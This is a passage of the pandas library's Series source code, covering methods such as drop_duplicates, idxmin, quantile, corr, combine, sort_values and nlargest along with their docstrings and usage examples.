array([2, 1, 3])
>>> pd.Series([pd.Timestamp('2016-01-01') for _ in range(3)]).unique()
array(['2016-01-01T00:00:00.000000000'], dtype='datetime64[ns]')
>>> pd.Series([pd.Timestamp('2016-01-01', tz='US/Eastern')
... for _ in range(3)]).unique()
<DatetimeArray>
['2016-01-01 00:00:00-05:00']
Length: 1, dtype: datetime64[ns, US/Eastern]
An unordered Categorical will return categories in the order of
appearance.
>>> pd.Series(pd.Categorical(list('baabc'))).unique()
[b, a, c]
Categories (3, object): [b, a, c]
An ordered Categorical preserves the category ordering.
>>> pd.Series(pd.Categorical(list('baabc'), categories=list('abc'),
... ordered=True)).unique()
[b, a, c]
Categories (3, object): [a < b < c]
"""
result = super().unique()
return result
def drop_duplicates(self, keep="first", inplace=False):
"""
Return Series with duplicate values removed.
Parameters
----------
keep : {'first', 'last', ``False``}, default 'first'
- 'first' : Drop duplicates except for the first occurrence.
- 'last' : Drop duplicates except for the last occurrence.
- ``False`` : Drop all duplicates.
inplace : bool, default ``False``
If ``True``, performs operation inplace and returns None.
Returns
-------
Series
Series with duplicates dropped.
See Also
--------
Index.drop_duplicates : Equivalent method on Index.
DataFrame.drop_duplicates : Equivalent method on DataFrame.
Series.duplicated : Related method on Series, indicating duplicate
Series values.
Examples
--------
Generate a Series with duplicated entries.
>>> s = pd.Series(['lama', 'cow', 'lama', 'beetle', 'lama', 'hippo'],
... name='animal')
>>> s
0 lama
1 cow
2 lama
3 beetle
4 lama
5 hippo
Name: animal, dtype: object
With the 'keep' parameter, the selection behaviour of duplicated values
can be changed. The value 'first' keeps the first occurrence for each
set of duplicated entries. The default value of keep is 'first'.
>>> s.drop_duplicates()
0 lama
1 cow
3 beetle
5 hippo
Name: animal, dtype: object
The value 'last' for parameter 'keep' keeps the last occurrence for
each set of duplicated entries.
>>> s.drop_duplicates(keep='last')
1 cow
3 beetle
4 lama
5 hippo
Name: animal, dtype: object
The value ``False`` for parameter 'keep' discards all sets of
duplicated entries. Setting the value of 'inplace' to ``True`` performs
the operation inplace and returns ``None``.
>>> s.drop_duplicates(keep=False, inplace=True)
>>> s
1 cow
3 beetle
5 hippo
Name: animal, dtype: object
"""
return super().drop_duplicates(keep=keep, inplace=inplace)
def duplicated(self, keep="first"):
"""
Indicate duplicate Series values.
Duplicated values are indicated as ``True`` values in the resulting
Series. Either all duplicates, all except the first or all except the
last occurrence of duplicates can be indicated.
Parameters
----------
keep : {'first', 'last', False}, default 'first'
- 'first' : Mark duplicates as ``True`` except for the first
occurrence.
- 'last' : Mark duplicates as ``True`` except for the last
occurrence.
- ``False`` : Mark all duplicates as ``True``.
Returns
-------
Series
Series indicating whether each value has occurred in the
preceding values.
See Also
--------
Index.duplicated : Equivalent method on pandas.Index.
DataFrame.duplicated : Equivalent method on pandas.DataFrame.
Series.drop_duplicates : Remove duplicate values from Series.
Examples
--------
By default, for each set of duplicated values, the first occurrence is
set on False and all others on True:
>>> animals = pd.Series(['lama', 'cow', 'lama', 'beetle', 'lama'])
>>> animals.duplicated()
0 False
1 False
2 True
3 False
4 True
dtype: bool
which is equivalent to
>>> animals.duplicated(keep='first')
0 False
1 False
2 True
3 False
4 True
dtype: bool
By using 'last', the last occurrence of each set of duplicated values
is set on False and all others on True:
>>> animals.duplicated(keep='last')
0 True
1 False
2 True
3 False
4 False
dtype: bool
By setting keep on ``False``, all duplicates are True:
>>> animals.duplicated(keep=False)
0 True
1 False
2 True
3 False
4 True
dtype: bool
"""
return super().duplicated(keep=keep)
def idxmin(self, axis=0, skipna=True, *args, **kwargs):
"""
Return the row label of the minimum value.
If multiple values equal the minimum, the first row label with that
value is returned.
Parameters
----------
skipna : bool, default True
Exclude NA/null values. If the entire Series is NA, the result
will be NA.
axis : int, default 0
For compatibility with DataFrame.idxmin. Redundant for application
on Series.
*args, **kwargs
Additional keywords have no effect but might be accepted
for compatibility with NumPy.
Returns
-------
Index
Label of the minimum value.
Raises
------
ValueError
If the Series is empty.
See Also
--------
numpy.argmin : Return indices of the minimum values
along the given axis.
DataFrame.idxmin : Return index of first occurrence of minimum
over requested axis.
Series.idxmax : Return index *label* of the first occurrence
of maximum of values.
Notes
-----
This method is the Series version of ``ndarray.argmin``. This method
returns the label of the minimum, while ``ndarray.argmin`` returns
the position. To get the position, use ``series.values.argmin()``.
Examples
--------
>>> s = pd.Series(data=[1, None, 4, 1],
... index=['A', 'B', 'C', 'D'])
>>> s
A 1.0
B NaN
C 4.0
D 1.0
dtype: float64
>>> s.idxmin()
'A'
If `skipna` is False and there is an NA value in the data,
the function returns ``nan``.
>>> s.idxmin(skipna=False)
nan
"""
skipna = nv.validate_argmin_with_skipna(skipna, args, kwargs)
i = nanops.nanargmin(com.values_from_object(self), skipna=skipna)
if i == -1:
return np.nan
return self.index[i]
def idxmax(self, axis=0, skipna=True, *args, **kwargs):
"""
Return the row label of the maximum value.
If multiple values equal the maximum, the first row label with that
value is returned.
Parameters
----------
skipna : bool, default True
Exclude NA/null values. If the entire Series is NA, the result
will be NA.
axis : int, default 0
For compatibility with DataFrame.idxmax. Redundant for application
on Series.
*args, **kwargs
Additional keywords have no effect but might be accepted
for compatibility with NumPy.
Returns
-------
Index
Label of the maximum value.
Raises
------
ValueError
If the Series is empty.
See Also
--------
numpy.argmax : Return indices of the maximum values
along the given axis.
DataFrame.idxmax : Return index of first occurrence of maximum
over requested axis.
Series.idxmin : Return index *label* of the first occurrence
of minimum of values.
Notes
-----
This method is the Series version of ``ndarray.argmax``. This method
returns the label of the maximum, while ``ndarray.argmax`` returns
the position. To get the position, use ``series.values.argmax()``.
Examples
--------
>>> s = pd.Series(data=[1, None, 4, 3, 4],
... index=['A', 'B', 'C', 'D', 'E'])
>>> s
A 1.0
B NaN
C 4.0
D 3.0
E 4.0
dtype: float64
>>> s.idxmax()
'C'
If `skipna` is False and there is an NA value in the data,
the function returns ``nan``.
>>> s.idxmax(skipna=False)
nan
"""
skipna = nv.validate_argmax_with_skipna(skipna, args, kwargs)
i = nanops.nanargmax(com.values_from_object(self), skipna=skipna)
if i == -1:
return np.nan
return self.index[i]
# ndarray compat
argmin = deprecate(
"argmin",
idxmin,
"0.21.0",
msg=dedent(
"""
The current behaviour of 'Series.argmin' is deprecated, use 'idxmin'
instead.
The behavior of 'argmin' will be corrected to return the positional
minimum in the future. For now, use 'series.values.argmin' or
'np.argmin(np.array(values))' to get the position of the minimum
row."""
),
)
argmax = deprecate(
"argmax",
idxmax,
"0.21.0",
msg=dedent(
"""
The current behaviour of 'Series.argmax' is deprecated, use 'idxmax'
instead.
The behavior of 'argmax' will be corrected to return the positional
maximum in the future. For now, use 'series.values.argmax' or
'np.argmax(np.array(values))' to get the position of the maximum
row."""
),
)
def round(self, decimals=0, *args, **kwargs):
"""
Round each value in a Series to the given number of decimals.
Parameters
----------
decimals : int
Number of decimal places to round to (default: 0).
If decimals is negative, it specifies the number of
positions to the left of the decimal point.
Returns
-------
Series
Rounded values of the Series.
See Also
--------
numpy.around : Round values of an np.array.
DataFrame.round : Round values of a DataFrame.
Examples
--------
>>> s = pd.Series([0.1, 1.3, 2.7])
>>> s.round()
0 0.0
1 1.0
2 3.0
dtype: float64
"""
nv.validate_round(args, kwargs)
result = com.values_from_object(self).round(decimals)
result = self._constructor(result, index=self.index).__finalize__(self)
return result
def quantile(self, q=0.5, interpolation="linear"):
"""
Return value at the given quantile.
Parameters
----------
q : float or array-like, default 0.5 (50% quantile)
0 <= q <= 1, the quantile(s) to compute.
interpolation : {'linear', 'lower', 'higher', 'midpoint', 'nearest'}
.. versionadded:: 0.18.0
This optional parameter specifies the interpolation method to use,
when the desired quantile lies between two data points `i` and `j`:
* linear: `i + (j - i) * fraction`, where `fraction` is the
fractional part of the index surrounded by `i` and `j`.
* lower: `i`.
* higher: `j`.
* nearest: `i` or `j` whichever is nearest.
* midpoint: (`i` + `j`) / 2.
Returns
-------
float or Series
If ``q`` is an array, a Series will be returned where the
index is ``q`` and the values are the quantiles, otherwise
a float will be returned.
See Also
--------
core.window.Rolling.quantile
numpy.percentile
Examples
--------
>>> s = pd.Series([1, 2, 3, 4])
>>> s.quantile(.5)
2.5
>>> s.quantile([.25, .5, .75])
0.25 1.75
0.50 2.50
0.75 3.25
dtype: float64
"""
self._check_percentile(q)
# We dispatch to DataFrame so that core.internals only has to worry
# about 2D cases.
df = self.to_frame()
result = df.quantile(q=q, interpolation=interpolation, numeric_only=False)
if result.ndim == 2:
result = result.iloc[:, 0]
if is_list_like(q):
result.name = self.name
return self._constructor(result, index=Float64Index(q), name=self.name)
else:
# scalar
return result.iloc[0]
def corr(self, other, method="pearson", min_periods=None):
"""
Compute correlation with `other` Series, excluding missing values.
Parameters
----------
other : Series
Series with which to compute the correlation.
method : {'pearson', 'kendall', 'spearman'} or callable
* pearson : standard correlation coefficient
* kendall : Kendall Tau correlation coefficient
* spearman : Spearman rank correlation
* callable: callable with input two 1d ndarrays
and returning a float. Note that the returned matrix from corr
will have 1 along the diagonals and will be symmetric
regardless of the callable's behavior
.. versionadded:: 0.24.0
min_periods : int, optional
Minimum number of observations needed to have a valid result.
Returns
-------
float
Correlation with other.
Examples
--------
>>> def histogram_intersection(a, b):
... v = np.minimum(a, b).sum().round(decimals=1)
... return v
>>> s1 = pd.Series([.2, .0, .6, .2])
>>> s2 = pd.Series([.3, .6, .0, .1])
>>> s1.corr(s2, method=histogram_intersection)
0.3
"""
this, other = self.align(other, join="inner", copy=False)
if len(this) == 0:
return np.nan
if method in ["pearson", "spearman", "kendall"] or callable(method):
return nanops.nancorr(
this.values, other.values, method=method, min_periods=min_periods
)
raise ValueError(
"method must be either 'pearson', "
"'spearman', 'kendall', or a callable, "
"'{method}' was supplied".format(method=method)
)
def cov(self, other, min_periods=None):
"""
Compute covariance with Series, excluding missing values.
Parameters
----------
other : Series
Series with which to compute the covariance.
min_periods : int, optional
Minimum number of observations needed to have a valid result.
Returns
-------
float
Covariance between Series and other normalized by N-1
(unbiased estimator).
Examples
--------
>>> s1 = pd.Series([0.90010907, 0.13484424, 0.62036035])
>>> s2 = pd.Series([0.12528585, 0.26962463, 0.51111198])
>>> s1.cov(s2)
-0.01685762652715874
"""
this, other = self.align(other, join="inner", copy=False)
if len(this) == 0:
return np.nan
return nanops.nancov(this.values, other.values, min_periods=min_periods)
def diff(self, periods=1):
"""
First discrete difference of element.
Calculates the difference of a Series element compared with another
element in the Series (default is element in previous row).
Parameters
----------
periods : int, default 1
Periods to shift for calculating difference, accepts negative
values.
Returns
-------
Series
First differences of the Series.
See Also
--------
Series.pct_change: Percent change over given number of periods.
Series.shift: Shift index by desired number of periods with an
optional time freq.
DataFrame.diff: First discrete difference of object.
Examples
--------
Difference with previous row
>>> s = pd.Series([1, 1, 2, 3, 5, 8])
>>> s.diff()
0 NaN
1 0.0
2 1.0
3 1.0
4 2.0
5 3.0
dtype: float64
Difference with 3rd previous row
>>> s.diff(periods=3)
0 NaN
1 NaN
2 NaN
3 2.0
4 4.0
5 6.0
dtype: float64
Difference with following row
>>> s.diff(periods=-1)
0 0.0
1 -1.0
2 -1.0
3 -2.0
4 -3.0
5 NaN
dtype: float64
"""
result = algorithms.diff(com.values_from_object(self), periods)
return self._constructor(result, index=self.index).__finalize__(self)
def autocorr(self, lag=1):
"""
Compute the lag-N autocorrelation.
This method computes the Pearson correlation between
the Series and its shifted self.
Parameters
----------
lag : int, default 1
Number of lags to apply before performing autocorrelation.
Returns
-------
float
The Pearson correlation between self and self.shift(lag).
See Also
--------
Series.corr : Compute the correlation between two Series.
Series.shift : Shift index by desired number of periods.
DataFrame.corr : Compute pairwise correlation of columns.
DataFrame.corrwith : Compute pairwise correlation between rows or
columns of two DataFrame objects.
Notes
-----
If the Pearson correlation is not well defined return 'NaN'.
Examples
--------
>>> s = pd.Series([0.25, 0.5, 0.2, -0.05])
>>> s.autocorr() # doctest: +ELLIPSIS
0.10355...
>>> s.autocorr(lag=2) # doctest: +ELLIPSIS
-0.99999...
If the Pearson correlation is not well defined, then 'NaN' is returned.
>>> s = pd.Series([1, 0, 0, 0])
>>> s.autocorr()
nan
"""
return self.corr(self.shift(lag))
def dot(self, other):
"""
Compute the dot product between the Series and the columns of other.
This method computes the dot product between the Series and another
one, or the Series and each columns of a DataFrame, or the Series and
each columns of an array.
It can also be called using `self @ other` in Python >= 3.5.
Parameters
----------
other : Series, DataFrame or array-like
The other object to compute the dot product with its columns.
Returns
-------
scalar, Series or numpy.ndarray
Return the dot product of the Series and other if other is a
Series, the Series of the dot product of Series and each rows of
other if other is a DataFrame or a numpy.ndarray between the Series
and each columns of the numpy array.
See Also
--------
DataFrame.dot: Compute the matrix product with the DataFrame.
Series.mul: Multiplication of series and other, element-wise.
Notes
-----
The Series and other has to share the same index if other is a Series
or a DataFrame.
Examples
--------
>>> s = pd.Series([0, 1, 2, 3])
>>> other = pd.Series([-1, 2, -3, 4])
>>> s.dot(other)
8
>>> s @ other
8
>>> df = pd.DataFrame([[0, 1], [-2, 3], [4, -5], [6, 7]])
>>> s.dot(df)
0 24
1 14
dtype: int64
>>> arr = np.array([[0, 1], [-2, 3], [4, -5], [6, 7]])
>>> s.dot(arr)
array([24, 14])
"""
from pandas.core.frame import DataFrame
if isinstance(other, (Series, DataFrame)):
common = self.index.union(other.index)
if len(common) > len(self.index) or len(common) > len(other.index):
raise ValueError("matrices are not aligned")
left = self.reindex(index=common, copy=False)
right = other.reindex(index=common, copy=False)
lvals = left.values
rvals = right.values
else:
lvals = self.values
rvals = np.asarray(other)
if lvals.shape[0] != rvals.shape[0]:
raise Exception(
"Dot product shape mismatch, %s vs %s" % (lvals.shape, rvals.shape)
)
if isinstance(other, DataFrame):
return self._constructor(
np.dot(lvals, rvals), index=other.columns
).__finalize__(self)
elif isinstance(other, Series):
return np.dot(lvals, rvals)
elif isinstance(rvals, np.ndarray):
return np.dot(lvals, rvals)
else: # pragma: no cover
raise TypeError("unsupported type: %s" % type(other))
def __matmul__(self, other):
"""
Matrix multiplication using binary `@` operator in Python>=3.5.
"""
return self.dot(other)
def __rmatmul__(self, other):
"""
Matrix multiplication using binary `@` operator in Python>=3.5.
"""
return self.dot(np.transpose(other))
@Substitution(klass="Series")
@Appender(base._shared_docs["searchsorted"])
def searchsorted(self, value, side="left", sorter=None):
return algorithms.searchsorted(self._values, value, side=side, sorter=sorter)
# -------------------------------------------------------------------
# Combination
def append(self, to_append, ignore_index=False, verify_integrity=False):
"""
Concatenate two or more Series.
Parameters
----------
to_append : Series or list/tuple of Series
Series to append with self.
ignore_index : bool, default False
If True, do not use the index labels.
.. versionadded:: 0.19.0
verify_integrity : bool, default False
If True, raise Exception on creating index with duplicates.
Returns
-------
Series
Concatenated Series.
See Also
--------
concat : General function to concatenate DataFrame or Series objects.
Notes
-----
Iteratively appending to a Series can be more computationally intensive
than a single concatenate. A better solution is to append values to a
list and then concatenate the list with the original Series all at
once.
Examples
--------
>>> s1 = pd.Series([1, 2, 3])
>>> s2 = pd.Series([4, 5, 6])
>>> s3 = pd.Series([4, 5, 6], index=[3, 4, 5])
>>> s1.append(s2)
0 1
1 2
2 3
0 4
1 5
2 6
dtype: int64
>>> s1.append(s3)
0 1
1 2
2 3
3 4
4 5
5 6
dtype: int64
With `ignore_index` set to True:
>>> s1.append(s2, ignore_index=True)
0 1
1 2
2 3
3 4
4 5
5 6
dtype: int64
With `verify_integrity` set to True:
>>> s1.append(s2, verify_integrity=True)
Traceback (most recent call last):
...
ValueError: Indexes have overlapping values: [0, 1, 2]
"""
from pandas.core.reshape.concat import concat
if isinstance(to_append, (list, tuple)):
to_concat = [self] + to_append
else:
to_concat = [self, to_append]
return concat(
to_concat, ignore_index=ignore_index, verify_integrity=verify_integrity
)
def _binop(self, other, func, level=None, fill_value=None):
"""
Perform generic binary operation with optional fill value.
Parameters
----------
other : Series
func : binary operator
fill_value : float or object
Value to substitute for NA/null values. If both Series are NA in a
location, the result will be NA regardless of the passed fill value
level : int or level name, default None
Broadcast across a level, matching Index values on the
passed MultiIndex level
Returns
-------
Series
"""
if not isinstance(other, Series):
raise AssertionError("Other operand must be Series")
new_index = self.index
this = self
if not self.index.equals(other.index):
this, other = self.align(other, level=level, join="outer", copy=False)
new_index = this.index
this_vals, other_vals = ops.fill_binop(this.values, other.values, fill_value)
with np.errstate(all="ignore"):
result = func(this_vals, other_vals)
name = ops.get_op_result_name(self, other)
if func.__name__ in ["divmod", "rdivmod"]:
ret = ops._construct_divmod_result(self, result, new_index, name)
else:
ret = ops._construct_result(self, result, new_index, name)
return ret
def combine(self, other, func, fill_value=None):
"""
Combine the Series with a Series or scalar according to `func`.
Combine the Series and `other` using `func` to perform elementwise
selection for combined Series.
`fill_value` is assumed when value is missing at some index
from one of the two objects being combined.
Parameters
----------
other : Series or scalar
The value(s) to be combined with the `Series`.
func : function
Function that takes two scalars as inputs and returns an element.
fill_value : scalar, optional
The value to assume when an index is missing from
one Series or the other. The default specifies to use the
appropriate NaN value for the underlying dtype of the Series.
Returns
-------
Series
The result of combining the Series with the other object.
See Also
--------
Series.combine_first : Combine Series values, choosing the calling
Series' values first.
Examples
--------
Consider 2 Datasets ``s1`` and ``s2`` containing
highest clocked speeds of different birds.
>>> s1 = pd.Series({'falcon': 330.0, 'eagle': 160.0})
>>> s1
falcon 330.0
eagle 160.0
dtype: float64
>>> s2 = pd.Series({'falcon': 345.0, 'eagle': 200.0, 'duck': 30.0})
>>> s2
falcon 345.0
eagle 200.0
duck 30.0
dtype: float64
Now, to combine the two datasets and view the highest speeds
of the birds across the two datasets
>>> s1.combine(s2, max)
duck NaN
eagle 200.0
falcon 345.0
dtype: float64
In the previous example, the resulting value for duck is missing,
because the maximum of a NaN and a float is a NaN.
So, in the example, we set ``fill_value=0``,
so the maximum value returned will be the value from some dataset.
>>> s1.combine(s2, max, fill_value=0)
duck 30.0
eagle 200.0
falcon 345.0
dtype: float64
"""
if fill_value is None:
fill_value = na_value_for_dtype(self.dtype, compat=False)
if isinstance(other, Series):
# If other is a Series, result is based on union of Series,
# so do this element by element
new_index = self.index.union(other.index)
new_name = ops.get_op_result_name(self, other)
new_values = []
for idx in new_index:
lv = self.get(idx, fill_value)
rv = other.get(idx, fill_value)
with np.errstate(all="ignore"):
new_values.append(func(lv, rv))
else:
# Assume that other is a scalar, so apply the function for
# each element in the Series
new_index = self.index
with np.errstate(all="ignore"):
new_values = [func(lv, other) for lv in self._values]
new_name = self.name
if is_categorical_dtype(self.values):
pass
elif is_extension_array_dtype(self.values):
# The function can return something of any type, so check
# if the type is compatible with the calling EA.
try:
new_values = self._values._from_sequence(new_values)
except Exception:
# https://github.com/pandas-dev/pandas/issues/22850
# pandas has no control over what 3rd-party ExtensionArrays
# do in _values_from_sequence. We still want ops to work
# though, so we catch any regular Exception.
pass
return self._constructor(new_values, index=new_index, name=new_name)
def combine_first(self, other):
"""
Combine Series values, choosing the calling Series's values first.
Parameters
----------
other : Series
The value(s) to be combined with the `Series`.
Returns
-------
Series
The result of combining the Series with the other object.
See Also
--------
Series.combine : Perform elementwise operation on two Series
using a given function.
Notes
-----
Result index will be the union of the two indexes.
Examples
--------
>>> s1 = pd.Series([1, np.nan])
>>> s2 = pd.Series([3, 4])
>>> s1.combine_first(s2)
0 1.0
1 4.0
dtype: float64
"""
new_index = self.index.union(other.index)
this = self.reindex(new_index, copy=False)
other = other.reindex(new_index, copy=False)
if is_datetimelike(this) and not is_datetimelike(other):
other = to_datetime(other)
return this.where(notna(this), other)
def update(self, other):
"""
Modify Series in place using non-NA values from passed
Series. Aligns on index.
Parameters
----------
other : Series
Examples
--------
>>> s = pd.Series([1, 2, 3])
>>> s.update(pd.Series([4, 5, 6]))
>>> s
0 4
1 5
2 6
dtype: int64
>>> s = pd.Series(['a', 'b', 'c'])
>>> s.update(pd.Series(['d', 'e'], index=[0, 2]))
>>> s
0 d
1 b
2 e
dtype: object
>>> s = pd.Series([1, 2, 3])
>>> s.update(pd.Series([4, 5, 6, 7, 8]))
>>> s
0 4
1 5
2 6
dtype: int64
If ``other`` contains NaNs the corresponding values are not updated
in the original Series.
>>> s = pd.Series([1, 2, 3])
>>> s.update(pd.Series([4, np.nan, 6]))
>>> s
0 4
1 2
2 6
dtype: int64
"""
other = other.reindex_like(self)
mask = notna(other)
self._data = self._data.putmask(mask=mask, new=other, inplace=True)
self._maybe_update_cacher()
# ----------------------------------------------------------------------
# Reindexing, sorting
def sort_values(
self,
axis=0,
ascending=True,
inplace=False,
kind="quicksort",
na_position="last",
):
"""
Sort by the values.
Sort a Series in ascending or descending order by some
criterion.
Parameters
----------
axis : {0 or 'index'}, default 0
Axis to direct sorting. The value 'index' is accepted for
compatibility with DataFrame.sort_values.
ascending : bool, default True
If True, sort values in ascending order, otherwise descending.
inplace : bool, default False
If True, perform operation in-place.
kind : {'quicksort', 'mergesort' or 'heapsort'}, default 'quicksort'
Choice of sorting algorithm. See also :func:`numpy.sort` for more
information. 'mergesort' is the only stable algorithm.
na_position : {'first' or 'last'}, default 'last'
Argument 'first' puts NaNs at the beginning, 'last' puts NaNs at
the end.
Returns
-------
Series
Series ordered by values.
See Also
--------
Series.sort_index : Sort by the Series indices.
DataFrame.sort_values : Sort DataFrame by the values along either axis.
DataFrame.sort_index : Sort DataFrame by indices.
Examples
--------
>>> s = pd.Series([np.nan, 1, 3, 10, 5])
>>> s
0 NaN
1 1.0
2 3.0
3 10.0
4 5.0
dtype: float64
Sort values ascending order (default behaviour)
>>> s.sort_values(ascending=True)
1 1.0
2 3.0
4 5.0
3 10.0
0 NaN
dtype: float64
Sort values descending order
>>> s.sort_values(ascending=False)
3 10.0
4 5.0
2 3.0
1 1.0
0 NaN
dtype: float64
Sort values inplace
>>> s.sort_values(ascending=False, inplace=True)
>>> s
3 10.0
4 5.0
2 3.0
1 1.0
0 NaN
dtype: float64
Sort values putting NAs first
>>> s.sort_values(na_position='first')
0 NaN
1 1.0
2 3.0
4 5.0
3 10.0
dtype: float64
Sort a series of strings
>>> s = pd.Series(['z', 'b', 'd', 'a', 'c'])
>>> s
0 z
1 b
2 d
3 a
4 c
dtype: object
>>> s.sort_values()
3 a
1 b
4 c
2 d
0 z
dtype: object
"""
inplace = validate_bool_kwarg(inplace, "inplace")
# Validate the axis parameter
self._get_axis_number(axis)
# GH 5856/5853
if inplace and self._is_cached:
raise ValueError(
"This Series is a view of some other array, to "
"sort in-place you must create a copy"
)
def _try_kind_sort(arr):
# easier to ask forgiveness than permission
try:
# if kind==mergesort, it can fail for object dtype
return arr.argsort(kind=kind)
except TypeError:
# stable sort not available for object dtype
# uses the argsort default quicksort
return arr.argsort(kind="quicksort")
arr = self._values
sortedIdx = np.empty(len(self), dtype=np.int32)
bad = isna(arr)
good = ~bad
idx = ibase.default_index(len(self))
argsorted = _try_kind_sort(arr[good])
if is_list_like(ascending):
if len(ascending) != 1:
raise ValueError(
"Length of ascending (%d) must be 1 "
"for Series" % (len(ascending))
)
ascending = ascending[0]
if not is_bool(ascending):
raise ValueError("ascending must be boolean")
if not ascending:
argsorted = argsorted[::-1]
if na_position == "last":
n = good.sum()
sortedIdx[:n] = idx[good][argsorted]
sortedIdx[n:] = idx[bad]
elif na_position == "first":
n = bad.sum()
sortedIdx[n:] = idx[good][argsorted]
sortedIdx[:n] = idx[bad]
else:
raise ValueError("invalid na_position: {!r}".format(na_position))
result = self._constructor(arr[sortedIdx], index=self.index[sortedIdx])
if inplace:
self._update_inplace(result)
else:
return result.__finalize__(self)
def sort_index(
self,
axis=0,
level=None,
ascending=True,
inplace=False,
kind="quicksort",
na_position="last",
sort_remaining=True,
):
"""
Sort Series by index labels.
Returns a new Series sorted by label if `inplace` argument is
``False``, otherwise updates the original series and returns None.
Parameters
----------
axis : int, default 0
Axis to direct sorting. This can only be 0 for Series.
level : int, optional
If not None, sort on values in specified index level(s).
ascending : bool, default true
Sort ascending vs. descending.
inplace : bool, default False
If True, perform operation in-place.
kind : {'quicksort', 'mergesort', 'heapsort'}, default 'quicksort'
Choice of sorting algorithm. See also :func:`numpy.sort` for more
information. 'mergesort' is the only stable algorithm. For
DataFrames, this option is only applied when sorting on a single
column or label.
na_position : {'first', 'last'}, default 'last'
If 'first' puts NaNs at the beginning, 'last' puts NaNs at the end.
Not implemented for MultiIndex.
sort_remaining : bool, default True
If True and sorting by level and index is multilevel, sort by other
levels too (in order) after sorting by specified level.
Returns
-------
Series
The original Series sorted by the labels.
See Also
--------
DataFrame.sort_index: Sort DataFrame by the index.
DataFrame.sort_values: Sort DataFrame by the value.
Series.sort_values : Sort Series by the value.
Examples
--------
>>> s = pd.Series(['a', 'b', 'c', 'd'], index=[3, 2, 1, 4])
>>> s.sort_index()
1 c
2 b
3 a
4 d
dtype: object
Sort Descending
>>> s.sort_index(ascending=False)
4 d
3 a
2 b
1 c
dtype: object
Sort Inplace
>>> s.sort_index(inplace=True)
>>> s
1 c
2 b
3 a
4 d
dtype: object
By default NaNs are put at the end, but use `na_position` to place
them at the beginning
>>> s = pd.Series(['a', 'b', 'c', 'd'], index=[3, 2, 1, np.nan])
>>> s.sort_index(na_position='first')
NaN d
1.0 c
2.0 b
3.0 a
dtype: object
Specify index level to sort
>>> arrays = [np.array(['qux', 'qux', 'foo', 'foo',
... 'baz', 'baz', 'bar', 'bar']),
... np.array(['two', 'one', 'two', 'one',
... 'two', 'one', 'two', 'one'])]
>>> s = pd.Series([1, 2, 3, 4, 5, 6, 7, 8], index=arrays)
>>> s.sort_index(level=1)
bar one 8
baz one 6
foo one 4
qux one 2
bar two 7
baz two 5
foo two 3
qux two 1
dtype: int64
Does not sort by remaining levels when sorting by levels
>>> s.sort_index(level=1, sort_remaining=False)
qux one 2
foo one 4
baz one 6
bar one 8
qux two 1
foo two 3
baz two 5
bar two 7
dtype: int64
"""
# TODO: this can be combined with DataFrame.sort_index impl as
# almost identical
inplace = validate_bool_kwarg(inplace, "inplace")
# Validate the axis parameter
self._get_axis_number(axis)
index = self.index
if level is not None:
new_index, indexer = index.sortlevel(
level, ascending=ascending, sort_remaining=sort_remaining
)
elif isinstance(index, MultiIndex):
from pandas.core.sorting import lexsort_indexer
labels = index._sort_levels_monotonic()
indexer = lexsort_indexer(
labels._get_codes_for_sorting(),
orders=ascending,
na_position=na_position,
)
else:
from pandas.core.sorting import nargsort
# Check monotonic-ness before sort an index
# GH11080
if (ascending and index.is_monotonic_increasing) or (
not ascending and index.is_monotonic_decreasing
):
if inplace:
return
else:
return self.copy()
indexer = nargsort(
index, kind=kind, ascending=ascending, na_position=na_position
)
indexer = ensure_platform_int(indexer)
new_index = index.take(indexer)
new_index = new_index._sort_levels_monotonic()
new_values = self._values.take(indexer)
result = self._constructor(new_values, index=new_index)
if inplace:
self._update_inplace(result)
else:
return result.__finalize__(self)
def argsort(self, axis=0, kind="quicksort", order=None):
"""
Override ndarray.argsort. Argsorts the value, omitting NA/null values,
and places the result in the same locations as the non-NA values.
Parameters
----------
axis : int
Has no effect but is accepted for compatibility with numpy.
kind : {'mergesort', 'quicksort', 'heapsort'}, default 'quicksort'
Choice of sorting algorithm. See np.sort for more
information. 'mergesort' is the only stable algorithm
order : None
Has no effect but is accepted for compatibility with numpy.
Returns
-------
Series
Positions of values within the sort order with -1 indicating
nan values.
See Also
--------
numpy.ndarray.argsort
"""
values = self._values
mask = isna(values)
if mask.any():
result = Series(-1, index=self.index, name=self.name, dtype="int64")
notmask = ~mask
result[notmask] = np.argsort(values[notmask], kind=kind)
return self._constructor(result, index=self.index).__finalize__(self)
else:
return self._constructor(
np.argsort(values, kind=kind), index=self.index, dtype="int64"
).__finalize__(self)
def nlargest(self, n=5, keep="first"):
"""
Return the largest `n` elements.
Parameters
----------
n : int, default 5
Return this many descending sorted values.
keep : {'first', 'last', 'all'}, default 'first'
When there are duplicate values that cannot all fit in a
Series of `n` elements:
- ``first`` : return the first `n` occurrences in order
of appearance.
- ``last`` : return the last `n` occurrences in reverse
order of appearance.
- ``all`` : keep all occurrences. This can result in a Series of
size larger than `n`.
Returns
-------
Series
The `n` largest values in the Series, sorted in decreasing order.
See Also
--------
Series.nsmallest: Get the `n` smallest elements.
Series.sort_values: Sort Series by values.
Series.head: Return the first `n` rows.
Notes
-----
Faster than ``.sort_values(ascending=False).head(n)`` for small `n`
relative to the size of the ``Series`` object.
Examples
--------
>>> countries_population = {"Italy": 59000000, "France": 65000000,
... "Malta": 434000, "Maldives": 434000,
... "Brunei": 434000, "Iceland": 337000,
... "Nauru": 11300, "Tuvalu": 11300,
... "Anguilla": 11300, "Monserat": 5200}
>>> s = pd.Series(countries_population)
>>> s
Italy 59000000
France 65000000
Malta 434000
Maldives 434000
Brunei 434000
Iceland 337000
Nauru 11300
Tuvalu 11300
Anguilla 11300
Monserat 5200
dtype: int64
The `n` largest elements where ``n=5`` by default.
>>> s.nlargest()
France 65000000
Italy 59000000
Malta 434000
Maldives 434000
Brunei 434000
dtype: int64
The `n` largest elements where ``n=3``. Default `keep` value is 'first'
so Malta will be kept.
>>> s.nlargest(3)
France 65000000
Italy 59000000
Malta 434000
dtype: int64
The `n` largest elements where ``n=3`` and keeping the last duplicates.
Brunei will be kept since it is the last with value 434000 based on
the index order.
>>> s.nlargest(3, keep='last')
France 65000000
Italy 59000000
Brunei 434000
dtype: int64
The `n` largest elements where ``n=3`` with all duplicates kept. Note
that the returned Series has five elements due to the three duplicates.
>>> s.nlargest(3, keep='all')
France 65000000
Italy 59000000
Malta 434000
Maldives 434000
Brunei 434000
dtype: int64
"""
return algorithms.SelectNSeries(self, n=n, keep=keep).nlargest()
def nsmallest(self, n=5, keep="first"):
"""
Return the smallest `n` elements.
Parameters
----------
n : int, default 5
Return this many ascending sorted values.
keep : {'first', 'last', 'all'}, default 'first'
